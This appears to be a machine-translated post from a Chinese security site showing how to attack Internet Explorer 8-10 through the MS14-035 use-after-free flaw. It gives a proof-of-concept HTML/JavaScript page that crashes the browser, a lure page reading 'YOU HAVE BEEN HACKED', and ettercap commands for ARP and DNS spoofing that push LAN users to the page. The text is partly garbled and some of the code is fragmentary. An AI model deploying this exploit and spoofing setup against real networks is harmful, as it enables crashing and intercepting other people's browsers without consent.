The use of“MS14-0 3 5”,the IE browser for malicious attacks-vulnerability warning-the black bar safety net

ID MYHACK58:62201454110
Type myhack58
Reporter 佚名
Modified 2014-09-27T00:00:00


  • This vulnerability could cause Internet Explorer to crash, to version have ie8,9,1 0, Microsoft in 1 4 year 6 month 1 0 day release the Update Patch,

So now the only attack there is no update this year 6 month 1 0 Number of IE browser. Details see here:

As described above, the use of this vulnerability, we need a piece of html code. The following I in the present machine the demo under the LAN attack it, drone

Is installed in a virtual machine in win7_sp1-ie9: the

First modify the /var/www directory index.html for the following:



<meta http-equiv="refresh" content="5;url=">

<title>YOU HAVE BEEN HACKED</title>



you have been hacked,and you will shutdown!!



This is the attack the target first open the page, the page first displays the “you have been hacked,and you will shutdown!!”, the

A forced first; then set the refresh time to 5 seconds"refresh"content=5):automatically after 5 seconds to open the back of which is the containing Li

With the ie vulnerability html page, which is here in the same directory of the new poc.html content for

(You can also directly index. html modified to the following content): the


<head><title>MS14-0 3 5 Internet Explorer CInput Use-after-free POC</title></head>


<form id="testfm">

<textarea id="child" value="a1" ></textarea>

<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>

<textarea id="child3" value="a2" ></textarea>

<input type="text" name="test1">



var startfl=false;

function changer() {

// Call of changer function will happen inside mshtml! CFormElement::DoReset call, after

//execution of this function crash in DoReset will happen when accessing freed CInput element

if (startfl) {

document. getElementById("testfm"). innerHTML = ""; // Destroy form contents, free next

CInput in DoReset




document. getElementById("child2"). checked = true;

document. getElementById("child2"). onpropertychange=changer;

startfl = true;

document. getElementById("testfm"). reset(); // DoReset call




Then open apache2, then use ettercap for dns spoofing: the

service apache2 start

ettercap-TqP dns_spoof-M arp:remote/ //

See the following effects: